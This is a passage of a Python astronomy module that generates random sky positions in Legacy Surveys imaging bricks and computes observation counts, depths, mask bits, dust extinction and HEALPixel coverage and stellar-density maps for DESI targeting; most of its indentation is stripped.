# ADM generate random points within the brick at the requested density
# ADM guard against potential wraparound bugs (assuming bricks are typical
    # ADM sizes of 0.25 x 0.25 sq. deg., or not much larger than that).
if wrap:
if ramax - ramin > 350.:
ramax -= 360.
spharea = box_area([ramin, ramax, decmin, decmax])
if poisson:
nrand = int(np.random.poisson(spharea*density))
else:
nrand = int(spharea*density)
# log.info('Full area covered by brick is {:.5f} sq. deg....t = {:.1f}s'
# .format(spharea,time()-start))
ras = np.random.uniform(ramin, ramax, nrand)
sindecmin, sindecmax = np.sin(np.radians(decmin)), np.sin(np.radians(decmax))
decs = np.degrees(
np.arcsin(1.-np.random.uniform(1-sindecmax, 1-sindecmin, nrand)))
nrand = len(ras)
# log.info('Generated {} randoms in brick with bounds [{:.3f},{:.3f},{:.3f},{:.3f}]...t = {:.1f}s'
# .format(nrand,ramin,ramax,decmin,decmax,time()-start))
return ras, decs
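# A hedged usage sketch (the edge values are illustrative): draw randoms
# for a nominal 0.25 x 0.25 sq. deg. brick at 1,000 points per sq. deg.
#     ras, decs = randoms_in_a_brick_from_edges(
#         180.0, 180.25, 30.0, 30.25, density=1000, seed=1)
# With poisson=True (the default), len(ras) is Poisson-distributed
# about box_area([180.0, 180.25, 30.0, 30.25]) * 1000.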
def randoms_in_a_brick_from_name(brickname, drdir, density=100000):
"""For a given brick name, return random (RA/Dec) positions in the brick.
Parameters
----------
brickname : :class:`str`
Name of brick in which to generate random points.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned.
Returns
-------
:class:`~numpy.array`
Right Ascensions of random points in brick.
:class:`~numpy.array`
Declinations of random points in brick.
Notes
-----
- First version copied shamelessly from Anand Raichoor.
"""
# ADM read in the survey bricks file to determine the brick boundaries
hdu = fits.open(drdir+'survey-bricks.fits.gz')
brickinfo = hdu[1].data
wbrick = np.where(brickinfo['brickname'] == brickname)[0]
if len(wbrick) == 0:
log.error('Brick {} does not exist'.format(brickname))
# else:
# log.info('Working on brick {}...t = {:.1f}s'.format(brickname,time()-start))
brick = brickinfo[wbrick][0]
ramin, ramax, decmin, decmax = brick['ra1'], brick['ra2'], brick['dec1'], brick['dec2']
# ADM create a unique random seed on the basis of the brick.
# ADM note this is only unique for bricksize=0.25 for bricks
# ADM that are more than 0.25 degrees from the poles.
uniqseed = int(4*ramin)*1000+int(4*(decmin+90))
np.random.seed(uniqseed)
# ADM generate random points within the brick at the requested density
# ADM guard against potential wraparound bugs
if ramax - ramin > 350.:
ramax -= 360.
spharea = box_area([ramin, ramax, decmin, decmax])
nrand = int(spharea*density)
# log.info('Full area covered by brick {} is {:.5f} sq. deg....t = {:.1f}s'
# .format(brickname,spharea,time()-start))
ras = np.random.uniform(ramin, ramax, nrand)
sindecmin, sindecmax = np.sin(np.radians(decmin)), np.sin(np.radians(decmax))
decs = np.degrees(np.arcsin(1.-np.random.uniform(1-sindecmax, 1-sindecmin, nrand)))
nrand = len(ras)
# log.info('Generated {} randoms in brick {} with bounds [{:.3f},{:.3f},{:.3f},{:.3f}]...t = {:.1f}s'
# .format(nrand,brickname,ramin,ramax,decmin,decmax,time()-start))
return ras, decs
def pre_or_post_dr8(drdir):
"""Whether the imaging surveys directory structure is before or after DR8
Parameters
----------
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Returns
-------
:class:`list`
        For DR7 and earlier, this just returns the original directory as
        a list. For DR8 and later, this returns a list of two directories,
        one corresponding to DECaLS and one corresponding to BASS/MzLS.
Notes
-----
- If the directory structure seems wrong or missing then the DR8
(and after) convention of a north/south split is assumed.
"""
if os.path.exists(os.path.join(drdir, "coadd")):
drdirs = [drdir]
else:
drdirs = [os.path.join(drdir, region) for region in ["north", "south"]]
return drdirs
def dr8_quantities_at_positions_in_a_brick(ras, decs, brickname, drdir,
aprad=0.75):
"""Wrap `quantities_at_positions_in_a_brick` for DR8 and beyond.
Notes
-----
- See :func:`~desitarget.randoms.quantities_at_positions_in_a_brick`
for details. This wrapper looks for TWO coadd directories in
`drdir` (one for DECaLS, one for MzLS/BASS) and, if it finds two,
      creates randoms for both surveys within the passed brick. The
wrapper also defaults to the behavior for only having one survey.
"""
# ADM determine if we must traverse two sets of brick directories.
drdirs = pre_or_post_dr8(drdir)
# ADM make the dictionary of quantities for one or two directories.
qall = []
for dd in drdirs:
q = quantities_at_positions_in_a_brick(ras, decs, brickname, dd,
aprad=aprad)
# ADM don't count bricks where we never read a file header.
if q is not None:
qall.append(q)
# ADM concatenate everything in qall into one dictionary.
qcombine = {}
# ADM catch the case where a coadd directory is completely missing.
if len(qall) == 0:
log.warning("missing brick: {}".format(brickname))
else:
for k in qall[0].keys():
qcombine[k] = np.concatenate([q[k] for q in qall])
return qcombine
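# A hedged usage sketch (the directory is illustrative): for a DR8+
# root that contains north/ and south/ sub-directories, the wrapper
# returns quantities concatenated across both camera systems:
#     q = dr8_quantities_at_positions_in_a_brick(
#         ras, decs, "1351p320",
#         "/global/cfs/cdirs/cosmo/data/legacysurvey/dr9")
#     q["nobs_g"], q["maskbits"], q["photsys"]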
def quantities_at_positions_in_a_brick(ras, decs, brickname, drdir,
aprad=0.75, justlist=False):
"""Observational quantities (per-band) at positions in a Legacy Surveys brick.
Parameters
----------
ras : :class:`~numpy.array`
Right Ascensions of interest (degrees).
decs : :class:`~numpy.array`
Declinations of interest (degrees).
brickname : :class:`str`
Name of brick which contains RA/Dec positions, e.g., '1351p320'.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
justlist : :class:`bool`, optional, defaults to ``False``
If ``True``, return a MAXIMAL list of all POSSIBLE files needed
to run for `brickname` and `drdir`. Overrides other inputs, but
ra/dec still have to be passed as *something* (e.g., [1], [1]).
Returns
-------
:class:`dictionary`
The number of observations (`nobs_x`), PSF depth (`psfdepth_x`)
galaxy depth (`galdepth_x`), PSF size (`psfsize_x`), sky
background (`apflux_x`) and inverse variance (`apflux_ivar_x`)
at each passed position in each band x=g,r,z. Plus, the
`psfdepth_w1` and `_w2` depths and the `maskbits`, `wisemask_w1`
and `_w2` information at each passed position for the brick.
Also adds a unique `objid` for each random, a `release` if
a release number can be determined from the input `drdir`, and
the photometric system `photsys` ("N" or "S" for north or south).
Notes
-----
- First version copied shamelessly from Anand Raichoor.
"""
# ADM guard against too low a density of random locations.
npts = len(ras)
if npts == 0:
msg = 'brick {} is empty. Increase the density of random points!'.format(brickname)
log.critical(msg)
raise ValueError(msg)
# ADM a list to populate with the files required to run the code.
fnlist = []
# ADM determine whether the coadd files have extension .gz or .fz
# based on the DR directory.
extn, extn_nb = dr_extension(drdir)
# ADM the output dictionary.
qdict = {}
# as a speed up, we assume all images in different filters for the brick have the same WCS
# -> if we have read it once (iswcs=True), we use this info
iswcs = False
# ADM this will store the instrument name the first time we touch the wcs
instrum = None
rootdir = os.path.join(drdir, 'coadd', brickname[:3], brickname)
fileform = os.path.join(rootdir, 'legacysurvey-{}-{}-{}.fits.{}')
# ADM loop through the filters and store the number of observations
# ADM etc. at the RA and Dec positions of the passed points.
for filt in ['g', 'r', 'z']:
# ADM the input file labels, and output column names and output
# ADM formats for each of the quantities of interest.
qnames = zip(['nexp', 'depth', 'galdepth', 'psfsize', 'image'],
['nobs', 'psfdepth', 'galdepth', 'psfsize', 'apflux'],
['i2', 'f4', 'f4', 'f4', 'f4'])
for qin, qout, qform in qnames:
fn = fileform.format(brickname, qin, filt, extn)
if justlist:
fnlist.append(fn)
else:
# ADM only process the WCS if there's a file for this filter.
# ADM also skip calculating aperture fluxes if aprad ~ 0.
if os.path.exists(fn) and not (qout == 'apflux' and aprad < 1e-8):
img = fits.open(fn)[extn_nb]
if not iswcs:
# ADM store the instrument name, if it isn't stored.
instrum = img.header["INSTRUME"].lower().strip()
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM get the quantity of interest at each location and
# ADM store in a dictionary with the filter and quantity.
if qout == 'apflux':
# ADM special treatment to photometer sky.
# ADM Read in the ivar image.
fnivar = fileform.format(brickname, 'invvar', filt, extn)
ivar = fits.open(fnivar)[extn_nb].data
with np.errstate(divide='ignore', invalid='ignore'):
# ADM ivars->errors, guard against 1/0.
imsigma = 1./np.sqrt(ivar)
imsigma[ivar == 0] = 0
# ADM aperture photometry at requested radius (aprad).
apxy = np.vstack((x, y)).T
aper = photutils.CircularAperture(apxy, aprad)
p = photutils.aperture_photometry(img.data, aper, error=imsigma)
# ADM store the results.
qdict[qout+'_'+filt] = np.array(p.field('aperture_sum'))
err = p.field('aperture_sum_err')
with np.errstate(divide='ignore', invalid='ignore'):
# ADM errors->ivars, guard against 1/0.
ivar = 1./err**2.
ivar[err == 0] = 0.
qdict[qout+'_ivar_'+filt] = np.array(ivar)
else:
qdict[qout+'_'+filt] = img.data[y.round().astype("int"), x.round().astype("int")]
# ADM if the file doesn't exist, set quantities to zero.
else:
if qout == 'apflux':
qdict['apflux_ivar_'+filt] = np.zeros(npts, dtype=qform)
qdict[qout+'_'+filt] = np.zeros(npts, dtype=qform)
# ADM add the MASKBITS and WISEMASK information.
fn = os.path.join(rootdir,
'legacysurvey-{}-maskbits.fits.{}'.format(brickname, extn))
# ADM only process the WCS if there's a file for this filter.
mnames = zip([extn_nb, extn_nb+1, extn_nb+2],
['maskbits', 'wisemask_w1', 'wisemask_w2'],
['>i2', '|u1', '|u1'])
if justlist:
fnlist.append(fn)
else:
for mextn, mout, mform in mnames:
if os.path.exists(fn):
img = fits.open(fn)[mextn]
# ADM use the WCS for the per-filter quantities if it exists.
if not iswcs:
# ADM store the instrument name, if it isn't yet stored.
instrum = img.header["INSTRUME"].lower().strip()
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM add the maskbits to the dictionary.
qdict[mout] = img.data[y.round().astype("int"), x.round().astype("int")]
else:
# ADM if no files are found, populate with zeros.
qdict[mout] = np.zeros(npts, dtype=mform)
# ADM if there was no maskbits file, populate with BAILOUT.
if mout == 'maskbits':
qdict[mout] |= 2**10
# ADM populate the photometric system in the quantity dictionary.
if not justlist:
if instrum is None:
# ADM don't count bricks where we never read a file header.
            return {}
elif instrum == 'decam':
qdict['photsys'] = np.array([b"S" for x in range(npts)], dtype='|S1')
else:
qdict['photsys'] = np.array([b"N" for x in range(npts)], dtype='|S1')
# log.info('Recorded quantities for each point in brick {}...t = {:.1f}s'
# .format(brickname,time()-start))
# ADM calculate and add WISE depths. The WCS is different for WISE.
iswcs = False
# ADM a dictionary of scalings from invvar to depth:
norm = {'W1': 0.240, 'W2': 0.255}
# ADM a dictionary of Vega-to-AB conversions:
vega_to_ab = {'W1': 2.699, 'W2': 3.339}
for band in ['W1', 'W2']:
# ADM the input file labels, and output column names and output
# ADM formats for each of the quantities of interest.
qnames = zip(['invvar'], ['psfdepth'], ['f4'])
for qin, qout, qform in qnames:
fn = fileform.format(brickname, qin, band, extn)
if justlist:
fnlist.append(fn)
else:
# ADM only process the WCS if there's a file for this band.
if os.path.exists(fn):
img = fits.open(fn)[extn_nb]
# ADM calculate the WCS if it wasn't, already.
if not iswcs:
w = WCS(img.header)
x, y = w.all_world2pix(ras, decs, 0)
iswcs = True
# ADM get the inverse variance at each location.
ivar = img.data[y.round().astype("int"), x.round().astype("int")]
# ADM convert to WISE depth in AB. From Dustin Lang on the
# decam-chatter mailing list on 06/20/19, 1:59PM MST:
# psfdepth_Wx_AB = invvar_Wx * norm_Wx**2 / fluxfactor_Wx**2
# where fluxfactor = 10.** (dm / -2.5), dm = vega_to_ab[band]
ff = 10.**(vega_to_ab[band] / -2.5)
# ADM store in a dictionary with the band and quantity.
qdict[qout+'_'+band] = ivar * norm[band]**2 / ff**2
# ADM if the file doesn't exist, set quantities to zero.
else:
qdict[qout+'_'+band] = np.zeros(npts, dtype=qform)
# ADM look up the RELEASE based on "standard" DR directory structure.
if justlist:
# ADM we need a tractor file. Then we have a list of all needed
# ADM files. So, return if justlist was passed as True.
tracdir = os.path.join(drdir, 'tractor', brickname[:3])
tracfile = os.path.join(tracdir, 'tractor-{}.fits'.format(brickname))
fnlist.append(tracfile)
return fnlist
# ADM populate the release number using a header from an nexp file.
fn = fileform.format(brickname, "nexp", '*', extn)
gen = iglob(fn)
try:
release = fitsio.read_header(next(gen), extn_nb)["DRVERSIO"]
# ADM if this isn't a standard DR structure, default to release=0.
except StopIteration:
release = 0
qdict["release"] = np.zeros_like((qdict['nobs_g'])) + release
# ADM assign OBJID based on ordering by RA. The ordering ensures that
# ADM northern and southern objects get the same OBJID.
qdict["objid"] = np.argsort(ras)
return qdict
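# A minimal standalone sketch (not from the original module) of the
# Vega-to-AB WISE depth conversion implemented just above; `ivar` is
# assumed to be an array of inverse variances from a WISE invvar coadd.
def _sketch_wise_ab_depth(ivar, band='W1'):
    """Convert WISE inverse variance to PSF depth in the AB system."""
    norm = {'W1': 0.240, 'W2': 0.255}        # invvar-to-depth scalings.
    vega_to_ab = {'W1': 2.699, 'W2': 3.339}  # Vega-to-AB offsets.
    # fluxfactor = 10**(dm / -2.5) for the Vega-to-AB offset dm.
    ff = 10.**(vega_to_ab[band] / -2.5)
    return ivar * norm[band]**2 / ff**2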
def hp_with_nobs_in_a_brick(ramin, ramax, decmin, decmax, brickname, drdir,
density=100000, nside=256):
"""Given a brick's edges/name, count randoms with NOBS > 1 in HEALPixels touching that brick.
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension.
ramax : :class:`float`
        The maximum "edge" of the brick in Right Ascension.
decmin : :class:`float`
The minimum "edge" of the brick in Declination.
decmax : :class:`float`
The maximum "edge" of the brick in Declination.
    brickname : :class:`str`
        Brick name that corresponds to the brick edges, e.g., '1351p320'.
drdir : :class:`str`
The root directory pointing to a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned.
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel NESTED nside number) at which to build the map.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the following columns:
HPXPIXEL:
Integer numbers of (only) those HEALPixels that overlap the passed brick
HPXCOUNT:
Numbers of random points with one or more observations (NOBS > 0) in the
passed Data Release of the Legacy Surveys for each returned HPXPIXEL.
Notes
-----
- The HEALPixel numbering uses the NESTED scheme.
    - In the event that there are no pixels with one or more observations
      in the passed brick, an empty structured array will be returned.
"""
# ADM this is only intended to work on one brick, so die if a larger
# ADM array is passed.
if not isinstance(brickname, str):
log.fatal("Only one brick can be passed at a time!")
raise ValueError
# ADM generate an empty structured array to return in the event that
# ADM no pixels with counts were found.
hpxinfo = np.zeros(0, dtype=[('HPXPIXEL', '>i4'), ('HPXCOUNT', '>i4')])
# ADM generate random points in the brick at the requested density.
ras, decs = randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax,
density=density, wrap=False)
# ADM retrieve the number of observations for each random point.
nobs_g, nobs_r, nobs_z = nobs_at_positions_in_a_brick(ras, decs, brickname,
drdir=drdir)
# ADM only retain points with one or more observations in all bands.
w = np.where((nobs_g > 0) & (nobs_r > 0) & (nobs_z > 0))
# ADM for non-zero observations, populate pixel numbers and counts.
if len(w[0]) > 0:
pixnums = hp.ang2pix(nside, np.radians(90.-decs[w]), np.radians(ras[w]),
nest=True)
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
hpxinfo = np.zeros(len(pixnum),
dtype=[('HPXPIXEL', '>i4'), ('HPXCOUNT', '>i4')])
hpxinfo['HPXPIXEL'] = pixnum
hpxinfo['HPXCOUNT'] = pixcnt
return hpxinfo
def get_dust(ras, decs, scaling=1, dustdir=None):
"""Get SFD E(B-V) values at a set of RA/Dec locations
Parameters
----------
    ras : :class:`numpy.array`
        Right Ascension in degrees.
    decs : :class:`numpy.array`
        Declination in degrees.
scaling : :class:`float`
Pass 1 for the SFD98 dust maps. A scaling of 0.86 corresponds
to the recalibration from Schlafly & Finkbeiner (2011).
dustdir : :class:`str`, optional, defaults to $DUST_DIR+'/maps'
The root directory pointing to SFD dust maps. If not
sent the code will try to use $DUST_DIR+'/maps' before failing.
Returns
-------
:class:`numpy.array`
E(B-V) values from the SFD dust maps at the passed locations
"""
from desiutil.dust import SFDMap
return SFDMap(mapdir=dustdir, scaling=scaling).ebv(ras, decs)
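# A minimal usage sketch: scaling=0.86 applies the Schlafly & Finkbeiner
# (2011) recalibration of the SFD98 maps; `ras`/`decs` are assumed to be
# arrays of coordinates in degrees.
def _sketch_get_dust_sf11(ras, decs, dustdir=None):
    """SFD E(B-V) at each location, recalibrated following SF11."""
    return get_dust(ras, decs, scaling=0.86, dustdir=dustdir)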
def get_quantities_in_a_brick(ramin, ramax, decmin, decmax, brickname,
density=100000, dustdir=None, aprad=0.75,
zeros=False, drdir=None, seed=1):
"""NOBS, DEPTHS etc. (per-band) for random points in a brick of the Legacy Surveys
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension
ramax : :class:`float`
The maximum "edge" of the brick in Right Ascension
decmin : :class:`float`
The minimum "edge" of the brick in Declination
decmax : :class:`float`
The maximum "edge" of the brick in Declination
    brickname : :class:`str`
        Brick name that corresponds to the brick edges, e.g., '1351p320'.
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg. As a typical brick is
~0.25 x 0.25 sq. deg. about (0.0625*density) points will be returned
dustdir : :class:`str`, optional, defaults to $DUST_DIR+'/maps'
The root directory pointing to SFD dust maps. If not
sent the code will try to use $DUST_DIR+'/maps' before failing.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
zeros : :class:`bool`, optional, defaults to ``False``
If ``True`` don't look up pixel-level info for the brick, just
return zeros. The only quantities populated are those that don't
need pixels (`RA`, `DEC`, `BRICKID`, `BRICKNAME`, `EBV`) and the
`NOBS_` quantities (which are set to zero).
drdir : :class:`str`, optional, defaults to None
The root directory pointing to a DR from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Only necessary to pass if zeros is ``False``.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the following columns:
RELEASE:
The Legacy Surveys release number.
OBJID:
A unique (to each brick) source identifier.
BRICKID:
ID that corresponds to the passed brick name.
BRICKNAME:
Passed brick name.
RA, DEC:
Right Ascension, Declination of a random location.
NOBS_G, R, Z:
Number of observations in g, r, z-band.
PSFDEPTH_G, R, Z:
PSF depth at this location in g, r, z.
GALDEPTH_G, R, Z:
Galaxy depth in g, r, z.
PSFDEPTH_W1, W2:
(PSF) depth in W1, W2 (AB mag system).
PSFSIZE_G, R, Z:
Weighted average PSF FWHM (arcsec).
APFLUX_G, R, Z:
Sky background extracted in `aprad`.
Will be zero if `aprad` < 1e-8 is passed.
APFLUX_IVAR_G, R, Z:
Inverse variance of sky background.
Will be zero if `aprad` < 1e-8 is passed.
MASKBITS:
Mask information. See header of extension 1 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
WISEMASK_W1:
Mask information. See header of extension 2 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
WISEMASK_W2:
Mask information. See header of extension 3 of *e.g.*
``coadd/132/1320p317/legacysurvey-1320p317-maskbits.fits.fz``
EBV:
E(B-V) at this location from the SFD dust maps.
PHOTSYS:
resolved north/south ('N' for an MzLS/BASS location,
'S' for a DECaLS location).
"""
# ADM only intended to work on one brick, so die for larger arrays.
if not isinstance(brickname, str):
log.fatal("Only one brick can be passed at a time!")
raise ValueError
# ADM generate random points in the brick at the requested density.
ras, decs = randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax,
density=density, wrap=False,
seed=seed)
# ADM only look up pixel-level quantities if zeros was not sent.
if not zeros:
# ADM retrieve the dictionary of quantities at each location.
qdict = dr8_quantities_at_positions_in_a_brick(ras, decs, brickname,
drdir, aprad=aprad)
# ADM catch where a coadd directory is completely missing.
if len(qdict) > 0:
# ADM if 2 different camera combinations overlapped a brick
# ADM then we need to duplicate the ras, decs as well.
if len(qdict['photsys']) == 2*len(ras):
ras = np.concatenate([ras, ras])
decs = np.concatenate([decs, decs])
# ADM the structured array to output.
qinfo = np.zeros(
len(ras),
dtype=[('RELEASE', '>i2'), ('BRICKID', '>i4'), ('BRICKNAME', 'S8'),
('OBJID', '>i4'), ('RA', '>f8'), ('DEC', 'f8'),
('NOBS_G', 'i2'), ('NOBS_R', 'i2'), ('NOBS_Z', 'i2'),
('PSFDEPTH_G', 'f4'), ('PSFDEPTH_R', 'f4'), ('PSFDEPTH_Z', 'f4'),
('GALDEPTH_G', 'f4'), ('GALDEPTH_R', 'f4'), ('GALDEPTH_Z', 'f4'),
('PSFDEPTH_W1', 'f4'), ('PSFDEPTH_W2', 'f4'),
('PSFSIZE_G', 'f4'), ('PSFSIZE_R', 'f4'), ('PSFSIZE_Z', 'f4'),
('APFLUX_G', 'f4'), ('APFLUX_R', 'f4'), ('APFLUX_Z', 'f4'),
('APFLUX_IVAR_G', 'f4'), ('APFLUX_IVAR_R', 'f4'), ('APFLUX_IVAR_Z', 'f4'),
('MASKBITS', 'i2'), ('WISEMASK_W1', '|u1'), ('WISEMASK_W2', '|u1'),
('EBV', 'f4'), ('PHOTSYS', '|S1')]
)
else:
qinfo = np.zeros(
len(ras),
dtype=[('BRICKID', '>i4'), ('BRICKNAME', 'S8'), ('RA', 'f8'), ('DEC', 'f8'),
('NOBS_G', 'i2'), ('NOBS_R', 'i2'), ('NOBS_Z', 'i2'),
('EBV', 'f4')]
)
# ADM retrieve the E(B-V) values for each random point.
ebv = get_dust(ras, decs, dustdir=dustdir)
# ADM we only looked up pixel-level quantities if zeros wasn't sent.
if not zeros:
# ADM catch the case where a coadd directory was missing.
if len(qdict) > 0:
# ADM store each quantity of interest in the structured array
# ADM remembering that the dictionary keys are lower-case text.
cols = qdict.keys()
for col in cols:
qinfo[col.upper()] = qdict[col]
# ADM add the RAs/Decs, brick id and brick name.
brickid = bricklookup[brickname]
qinfo["RA"], qinfo["DEC"] = ras, decs
qinfo["BRICKNAME"], qinfo["BRICKID"] = brickname, brickid
# ADM add the dust values.
qinfo["EBV"] = ebv
return qinfo
def pixweight(randoms, density, nobsgrz=[0, 0, 0], nside=256,
outarea=True, maskbits=None):
"""Fraction of area covered in HEALPixels by a random catalog.
Parameters
----------
randoms : :class:`~numpy.ndarray` or `str`
A random catalog as made by, e.g., :func:`select_randoms()` or
:func:`quantities_at_positions_in_a_brick()`, or a file that
contains such a catalog. Must contain the columns RA, DEC,
NOBS_G, NOBS_R, NOBS_Z, MASKBITS.
density : :class:`int`
        The number of random points per sq. deg. at which the random
        catalog was generated (see also :func:`select_randoms()`).
nobsgrz : :class:`list`, optional, defaults to [0,0,0]
The number of observations in each of g AND r AND z that must
be EXCEEDED to include a random point in the count. The default
is to include areas that have at least one observation in each
band ([0,0,0]). `nobsgrz = [0,-1,-1]` would count areas with at
least one (more than zero) observations in g-band but any number
of observations (more than -1) in r-band and z-band.
nside : :class:`int`, optional, defaults to nside=256
The resolution (HEALPixel NESTED nside number) at which to build
the map (default nside=256 is ~0.0525 sq. deg. or "brick-sized")
outarea : :class:`boolean`, optional, defaults to True
Print the total area of the survey for passed values to screen.
maskbits : :class:`int`, optional, defaults to ``None``
If not ``None`` then restrict to only locations with these
        values of maskbits NOT set (bitwise inclusive, so, e.g., for 7,
restrict to random points with none of 2**0, 2**1 or 2**2 set).
Returns
-------
:class:`~numpy.ndarray`
The weight for EACH pixel in the sky at the passed nside.
Notes
-----
- `WEIGHT=1` means >=1 pointings across the entire pixel.
- `WEIGHT=0` means zero observations within it (e.g., perhaps
the pixel is completely outside of the LS DR footprint).
- `0 < WEIGHT < 1` for pixels that partially cover the LS DR
area with one or more observations.
- The index of the returned array is the HEALPixel integer.
"""
# ADM if a file name was passed for the random catalog, read it in.
if isinstance(randoms, str):
randoms = fitsio.read(randoms)
# ADM extract the columns of interest
ras, decs = randoms["RA"], randoms["DEC"]
nobs_g = randoms["NOBS_G"]
nobs_r = randoms["NOBS_R"]
nobs_z = randoms["NOBS_Z"]
# ADM only retain points with one or more observations in all bands
# ADM and appropriate maskbits values.
ii = (nobs_g > nobsgrz[0])
ii &= (nobs_r > nobsgrz[1])
ii &= (nobs_z > nobsgrz[2])
# ADM also restrict to appropriate maskbits values, if passed.
if maskbits is not None:
mb = randoms["MASKBITS"]
ii &= (mb & maskbits) == 0
# ADM the counts in each HEALPixel in the survey.
if np.sum(ii) > 0:
pixnums = hp.ang2pix(nside, np.radians(90.-decs[ii]),
np.radians(ras[ii]), nest=True)
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
else:
msg = "zero area based on randoms with passed constraints"
log.error(msg)
raise ValueError
# ADM whole-sky-counts to retain zeros for zero survey coverage.
npix = hp.nside2npix(nside)
pix_cnt = np.bincount(pixnum, weights=pixcnt, minlength=npix)
# ADM expected area based on the HEALPixels at this nside.
expected_cnt = hp.nside2pixarea(nside, degrees=True)*density
# ADM weight map based on (actual counts)/(expected counts).
pix_weight = pix_cnt/expected_cnt
# ADM if requested, print the total area of the survey to screen.
if outarea:
area = np.sum(pix_weight*hp.nside2pixarea(nside, degrees=True))
if maskbits is None:
log.info('Area of survey with NOBS > {} in [g,r,z] = {:.2f} sq. deg.'
.format(nobsgrz, area))
else:
log.info(
'Area, NOBS > {} in [g,r,z], maskbits of {} = {:.2f} sq. deg.'
.format(nobsgrz, maskbits, area))
log.info('Done...t = {:.1f}s'.format(time()-start))
return pix_weight
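# A minimal sketch of turning a pixweight() map into a survey area. The
# random-catalog file name and the choice of masked bits are hypothetical.
def _sketch_area_from_pixweight(randomsfile, density, nside=256):
    """Area (sq. deg.) with >=1 observation in g, r and z, masking
    locations that have any of bits 0, 1 or 13 set."""
    import fitsio
    import healpy as hp
    import numpy as np
    randoms = fitsio.read(randomsfile)
    pw = pixweight(randoms, density, nside=nside,
                   maskbits=2**0 | 2**1 | 2**13)
    # Each pixel contributes its fractional coverage times its area.
    return np.sum(pw * hp.nside2pixarea(nside, degrees=True))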
def stellar_density(nside=256):
"""Make a HEALPixel map of stellar density based on Gaia.
Parameters
----------
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel NESTED nside number) at which to build the map.
Notes
-----
- The environment variable $GAIA_DIR must be set.
"""
# ADM check that the GAIA_DIR is set and retrieve it.
gaiadir = get_gaia_dir()
hpdir = os.path.join(gaiadir, 'healpix')
# ADM the number of pixels and the pixel area at nside.
npix = hp.nside2npix(nside)
pixarea = hp.nside2pixarea(nside, degrees=True)
# ADM an output array of all possible HEALPixels at nside.
pixout = np.zeros(npix, dtype='int32')
# ADM find all of the Gaia files.
filenames = glob(os.path.join(hpdir, '*fits'))
# ADM read in each file, restricting to the criteria for point
# ADM sources and storing in a HEALPixel map at resolution nside.
nfiles = len(filenames)
t0 = time()
for nfile, filename in enumerate(filenames):
if nfile % 1000 == 0 and nfile > 0:
elapsed = time() - t0
rate = nfile / elapsed
log.info('{}/{} files; {:.1f} files/sec; {:.1f} total mins elapsed'
.format(nfile, nfiles, rate, elapsed/60.))
# ADM save memory, speed up by only reading a subset of columns.
gobjs = fitsio.read(
filename,
columns=['RA', 'DEC', 'PHOT_G_MEAN_MAG', 'ASTROMETRIC_EXCESS_NOISE']
)
# ADM restrict to subset of point sources.
ra, dec = gobjs["RA"], gobjs["DEC"]
gmag = gobjs["PHOT_G_MEAN_MAG"]
excess = gobjs["ASTROMETRIC_EXCESS_NOISE"]
point = (excess == 0.) | (np.log10(excess) < 0.3*gmag-5.3)
grange = (gmag >= 12) & (gmag < 17)
w = np.where(point & grange)
# ADM calculate the HEALPixels for the point sources.
theta, phi = np.radians(90-dec[w]), np.radians(ra[w])
pixnums = hp.ang2pix(nside, theta, phi, nest=True)
# ADM return the counts in each pixel number...
pixnum, pixcnt = np.unique(pixnums, return_counts=True)
# ADM...and populate the output array with the counts.
pixout[pixnum] += pixcnt
# ADM return the density
return pixout/pixarea
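# A minimal sketch (not from the original module) of the Gaia point-source
# criterion used in stellar_density(); `gmag` and `excess` are assumed to
# be arrays of G magnitudes and astrometric excess noise.
def _sketch_gaia_point_sources(gmag, excess):
    """Boolean mask of likely point sources with 12 <= G < 17."""
    import numpy as np
    with np.errstate(divide='ignore'):
        point = (excess == 0.) | (np.log10(excess) < 0.3*gmag - 5.3)
    return point & (gmag >= 12) & (gmag < 17)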
def get_targ_dens(targets, Mx, nside=256):
"""The density of targets in HEALPixels.
Parameters
----------
targets : :class:`~numpy.ndarray` or `str`
A corresponding (same Legacy Surveys Data Release) target catalog as made by,
e.g., :func:`desitarget.cuts.select_targets()`, or the name of such a file.
Mx : :class:`list` or `~numpy.array`
The targeting bitmasks associated with the passed targets, assumed to be
